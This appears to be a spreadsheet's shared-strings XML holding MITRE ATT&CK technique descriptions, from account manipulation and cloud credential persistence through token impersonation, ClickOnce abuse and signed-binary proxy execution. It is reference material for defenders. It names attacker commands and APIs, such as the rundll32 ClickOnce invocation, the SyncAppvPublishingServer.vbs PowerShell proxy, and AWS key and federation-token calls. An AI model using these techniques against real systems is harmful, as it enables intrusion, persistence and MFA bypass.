Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. 
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. 
</t>
  </si>
  <si>
    <t>T1080</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</si>
  <si>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</si>
  <si>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T1082</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</si>
  <si>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</si>
  <si>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T1083</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</si>
  <si>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
Some files and directories may require elevated or specific user permissions to access.</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>IaaS, Identity Provider, Linux, Office Suite, SaaS, Windows, macOS</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</si>
  <si>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lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.</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</si>
  <si>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 on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">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 on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including &lt;code&gt;Get-ADUser&lt;/code&gt; and &lt;code&gt;Get-ADGroupMember&lt;/code&gt; may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)  </t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt;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</si>
  <si>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</si>
  <si>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T1090</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may chain together multiple proxies to disguise the source of malicious traffic.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For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant) 
In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.  
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)</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</si>
  <si>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</si>
  <si>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T1091</t>
  </si>
  <si>
    <t>Initial Access, Lateral Movement</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014)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</si>
  <si>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T1095</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.(Citation: FireEye SMOKEDHAM June 2021)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t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID.(Citation: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
Adversaries may also use the &lt;code&gt;CreateAccessKey&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud iam service-accounts keys create&lt;/code&gt; command in GCP to add access keys to an account. Alternatively, they may use the &lt;code&gt;CreateLoginProfile&lt;/code&gt; API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024) If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) 
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence)
In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords)</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 
For example,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In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) 
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)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t>
  </si>
  <si>
    <t>User Account: User Account Modification</t>
  </si>
  <si>
    <t>An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)
(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.
For example, in AWS environments, an adversary with appropriate permissions may be able to use the &lt;code&gt;CreatePolicyVersion&lt;/code&gt; API to define a new version of an IAM policy or the &lt;code&gt;AttachUserPolicy&lt;/code&gt; API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)</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</si>
  <si>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In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. 
SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)</t>
  </si>
  <si>
    <t>Identity Provider, Windows</t>
  </si>
  <si>
    <t>Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) 
Devices registered in Entra ID may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT)</t>
  </si>
  <si>
    <t>An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised.  
Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based  role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).</t>
  </si>
  <si>
    <t>An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.
On Windows, accounts may use the `net localgroup` and `net group` commands to add existing users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation: Microsoft Net Group) On Linux, adversaries may use the `usermod` command for the same purpose.(Citation: Linux Usermod)
For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) for elevated privileges. 
In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.(Citation: RootDSE AD Detection 2022)</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024)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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1104</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</si>
  <si>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</si>
  <si>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T1105</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</si>
  <si>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Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)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t>
  </si>
  <si>
    <t>T1106</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018)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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1111</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</si>
  <si>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</si>
  <si>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T1112</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</si>
  <si>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</si>
  <si>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T1113</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</si>
  <si>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</si>
  <si>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T1114</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses.(Citation: TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries can collect or forward email from mail servers or clients. </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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1115</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</si>
  <si>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</si>
  <si>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T1119</t>
  </si>
  <si>
    <t>IaaS, Linux, Office Suite, SaaS, Windows, macOS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</si>
  <si>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data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023)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</si>
  <si>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T1120</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</si>
  <si>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</si>
  <si>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T1123</t>
  </si>
  <si>
    <t>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or &lt;code&gt;systemsetup&lt;/code&gt; on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)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In addition, adversaries can discover device uptime through functions such as &lt;code&gt;GetTickCount()&lt;/code&gt; to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)
In addition, system calls – such as &lt;code&gt;time()&lt;/code&gt; – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as &lt;code&gt;systemsetup -gettimezone&lt;/code&gt; or &lt;code&gt;timeIntervalSinceNow&lt;/code&gt; to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)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</si>
  <si>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T1125</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</si>
  <si>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</si>
  <si>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T1127</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</si>
  <si>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</si>
  <si>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Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)</t>
  </si>
  <si>
    <t>T1129</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1132</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1133</t>
  </si>
  <si>
    <t>Initial Access, Persistence</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1134</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.
An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.
When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.</t>
  </si>
  <si>
    <t>Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft RunAs)
Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.
While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.</t>
  </si>
  <si>
    <t>Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.
This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1135</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</si>
  <si>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</si>
  <si>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T1136</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020)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</si>
  <si>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</si>
  <si>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account.(Citation: Savill 1999)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</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</si>
  <si>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In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role)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t>
  </si>
  <si>
    <t>T1137</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</si>
  <si>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</si>
  <si>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</si>
  <si>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such as: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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1140</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</si>
  <si>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</si>
  <si>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T1176</t>
  </si>
  <si>
    <t xml:space="preserve">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 for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) </t>
  </si>
  <si>
    <t>T1185</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</si>
  <si>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</si>
  <si>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T1187</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</si>
  <si>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</si>
  <si>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T1189</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</si>
  <si>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</si>
  <si>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T1190</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</si>
  <si>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(e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)),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t>
  </si>
  <si>
    <t>T1195</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Sensor Health: Host Status</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</si>
  <si>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</si>
  <si>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T1197</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>T1199</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1200</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1201</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1202</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</si>
  <si>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Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)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</si>
  <si>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T1203</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</si>
  <si>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</si>
  <si>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T1204</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</si>
  <si>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 Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
* Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
* Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
* Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)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</si>
  <si>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</si>
  <si>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.cpl, and .reg.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</si>
  <si>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t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Command and Control, Defense Evasion, Persistence</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)
Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.</t>
  </si>
  <si>
    <t>T1207</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</si>
  <si>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</si>
  <si>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T1210</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1211</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</si>
  <si>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</si>
  <si>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T1212</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1213</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</si>
  <si>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such as Credential Access, Lateral Movement, or Defense Evasion, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).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 Contact or other sensitive information about business partners and customers, including personally identifiable information (PII) 
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include the following:
* Storage services such as IaaS databases, enterprise databases, and more specialized platforms such as customer relationship management (CRM) databases 
* Collaboration platforms such as SharePoint, Confluence, and code repositories
* Messaging platforms such as Slack and Microsoft Teams 
In some cases, information repositories have been improperly secured, typically by unintentionally allowing for overly-broad access by all users or even public access to unauthenticated users. This is particularly common with cloud-native or cloud-hosted services, such as AWS Relational Database Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Unsecured Credentials](https://attack.mitre.org/techniques/T1552)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t>
  </si>
  <si>
    <t>Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.</t>
  </si>
  <si>
    <t>Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.  
The following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications: 
* Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008)) 
* Source code snippets 
* Links to network shares and other internal resources 
* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)
* Discussions about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker 2021)(Citation: Microsoft DEV-0537)
In addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.(Citation: Sentinel Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)</t>
  </si>
  <si>
    <t>T1216</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)
The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)
Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)
For example,  [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)
`SyncAppvPublishingServer.vbs "n; {PowerShell}"`</t>
  </si>
  <si>
    <t>T1217</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</si>
  <si>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</si>
  <si>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T1218</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)
